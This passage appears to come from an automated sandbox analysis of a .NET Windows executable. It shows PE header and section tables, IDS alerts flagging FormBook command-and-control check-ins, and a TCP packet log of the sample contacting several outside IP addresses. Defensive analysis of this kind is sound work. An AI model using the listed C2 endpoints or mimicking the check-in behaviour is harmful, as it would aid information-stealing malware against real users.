                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb4a640x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x13bc.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb80000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xb2adc0xb2c000544d70ef86ea8aa278e8015637eab75False0.9363076376748252OpenPGP Public Key7.809008568803863IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xb60000x13bc0x140071325526bfa90631d6d0eab19a90cb5fFalse0.732421875data6.944321747106777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xb80000xc0x2002343a4d9132ecfe6c5af1a83c5499ddbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xb61000xd91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8692772818888569
                                                                                                            RT_GROUP_ICON0xb6ea40x14data1.05
                                                                                                            RT_VERSION0xb6ec80x2f4data0.43386243386243384
                                                                                                            RT_MANIFEST0xb71cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-06T09:32:50.567866+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44979374.208.236.15680TCP
                                                                                                            2024-12-06T09:33:15.401198+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44985484.32.84.3280TCP
                                                                                                            2024-12-06T09:33:30.175870+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44989313.248.169.4880TCP
                                                                                                            2024-12-06T09:33:44.927682+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44992866.29.149.4680TCP
                                                                                                            2024-12-06T09:33:59.682341+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4499673.33.130.19080TCP
                                                                                                            2024-12-06T09:34:14.929015+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450005129.226.153.8580TCP
                                                                                                            2024-12-06T09:34:30.508372+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450033104.21.7.18780TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 6, 2024 09:32:49.290064096 CET4979380192.168.2.474.208.236.156
                                                                                                            Dec 6, 2024 09:32:49.409900904 CET804979374.208.236.156192.168.2.4
                                                                                                            Dec 6, 2024 09:32:49.410010099 CET4979380192.168.2.474.208.236.156
                                                                                                            Dec 6, 2024 09:32:49.420677900 CET4979380192.168.2.474.208.236.156
                                                                                                            Dec 6, 2024 09:32:49.540436983 CET804979374.208.236.156192.168.2.4
                                                                                                            Dec 6, 2024 09:32:50.566658974 CET804979374.208.236.156192.168.2.4
                                                                                                            Dec 6, 2024 09:32:50.567727089 CET804979374.208.236.156192.168.2.4
                                                                                                            Dec 6, 2024 09:32:50.567866087 CET4979380192.168.2.474.208.236.156
                                                                                                            Dec 6, 2024 09:32:50.589359045 CET4979380192.168.2.474.208.236.156
                                                                                                            Dec 6, 2024 09:32:50.709263086 CET804979374.208.236.156192.168.2.4
                                                                                                            Dec 6, 2024 09:33:06.106992006 CET4983280192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:06.226774931 CET804983284.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:06.226986885 CET4983280192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:06.242942095 CET4983280192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:06.363332987 CET804983284.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:07.326562881 CET804983284.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:07.326647997 CET4983280192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:07.759279013 CET4983280192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:07.878925085 CET804983284.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:08.778538942 CET4983880192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:08.898278952 CET804983884.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:08.898355961 CET4983880192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:08.914823055 CET4983880192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:09.195046902 CET804983884.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:09.996527910 CET804983884.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:09.996629953 CET4983880192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:10.429244041 CET4983880192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:10.549139023 CET804983884.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.465596914 CET4984780192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:11.585326910 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.585427046 CET4984780192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:11.603178978 CET4984780192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:11.723072052 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723088980 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723150015 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723160028 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723176956 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723186016 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723236084 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723244905 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:11.723335028 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:12.684766054 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:12.684861898 CET4984780192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:13.116929054 CET4984780192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:13.236634016 CET804984784.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:14.175590992 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:14.295221090 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:14.295321941 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:14.391096115 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:14.510812998 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.400970936 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.400999069 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401012897 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401109934 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401123047 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401197910 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.401237011 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401251078 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401273012 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401292086 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401371956 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.401371956 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.401371956 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.401597977 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:15.401652098 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.406395912 CET4985480192.168.2.484.32.84.32
                                                                                                            Dec 6, 2024 09:33:15.526053905 CET804985484.32.84.32192.168.2.4
                                                                                                            Dec 6, 2024 09:33:20.950190067 CET4987080192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:21.070166111 CET804987013.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:21.070349932 CET4987080192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:21.086631060 CET4987080192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:21.206545115 CET804987013.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:22.206442118 CET804987013.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:22.206455946 CET804987013.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:22.206530094 CET4987080192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:22.601171017 CET4987080192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:23.619976044 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:23.739753008 CET804987713.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:23.739902020 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:23.755806923 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:23.875461102 CET804987713.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:24.839090109 CET804987713.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:24.839253902 CET804987713.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:24.839301109 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:25.257517099 CET4987780192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.282963037 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.402766943 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.402913094 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.417774916 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:26.537619114 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537635088 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537759066 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537787914 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537918091 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.537995100 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538136005 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538199902 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:26.538300991 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.501828909 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.514877081 CET804988313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:27.514931917 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:27.929272890 CET4988380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:28.948360920 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.068183899 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:29.068326950 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.078272104 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:29.197985888 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175510883 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175532103 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:30.175869942 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:30.178553104 CET4989380192.168.2.413.248.169.48
                                                                                                            Dec 6, 2024 09:33:30.298243046 CET804989313.248.169.48192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.582091093 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.702044010 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.702120066 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.718354940 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:35.838104010 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940644979 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940819025 CET804990966.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:36.940884113 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:37.226471901 CET4990980192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.245369911 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.365242004 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:38.365477085 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.385524035 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:38.505287886 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594408989 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594544888 CET804991566.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:39.594656944 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:39.898053885 CET4991580192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:40.917351961 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.037259102 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.037345886 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.053081989 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:41.173074007 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173099041 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173156977 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173194885 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173238993 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173294067 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173417091 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173511982 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:41.173711061 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341586113 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341694117 CET804992266.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:42.341744900 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:42.554330111 CET4992280192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.573290110 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.693461895 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:43.693603992 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.704458952 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:43.824206114 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927356005 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927386045 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:44.927681923 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:44.930295944 CET4992880192.168.2.466.29.149.46
                                                                                                            Dec 6, 2024 09:33:45.049969912 CET804992866.29.149.46192.168.2.4
                                                                                                            Dec 6, 2024 09:33:50.463823080 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.583554983 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:50.583681107 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.599488020 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:50.719144106 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680159092 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680320024 CET80499443.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:51.680394888 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:52.123198986 CET4994480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.137933969 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.257635117 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:53.257772923 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.275473118 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:53.395236969 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352587938 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352756977 CET80499543.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:54.352835894 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:54.789581060 CET4995480192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.807003021 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.926791906 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:55.927000999 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:55.942903042 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:56.062938929 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062952995 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062968016 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.062978983 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063000917 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063163996 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063230038 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063240051 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:56.063280106 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.024739981 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.024986029 CET80499603.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:57.025067091 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:57.444972992 CET4996080192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.463835001 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.583678007 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:58.583753109 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.593664885 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:58.713356018 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682074070 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682281971 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:33:59.682341099 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:59.684819937 CET4996780192.168.2.43.33.130.190
                                                                                                            Dec 6, 2024 09:33:59.804570913 CET80499673.33.130.190192.168.2.4
                                                                                                            Dec 6, 2024 09:34:05.272212982 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.391947031 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:05.392067909 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.413283110 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:05.533097982 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.929465055 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.936852932 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936871052 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936882973 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936980963 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936994076 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.936997890 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937009096 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937024117 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937154055 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937184095 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937196970 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937259912 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937273979 CET8049983129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:06.937283039 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:06.937345028 CET4998380192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:07.948371887 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.068165064 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:08.068285942 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.083704948 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:08.203481913 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.585797071 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608288050 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608318090 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608330965 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608371973 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608402014 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608472109 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608484983 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608495951 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608510017 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608534098 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608565092 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608726978 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608738899 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608779907 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608812094 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:09.608844042 CET8049989129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:09.608961105 CET4998980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:10.604697943 CET4999980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:10.724463940 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.724543095 CET4999980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:10.739825010 CET4999980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:10.859642982 CET8049999129.226.153.85192.168.2.4
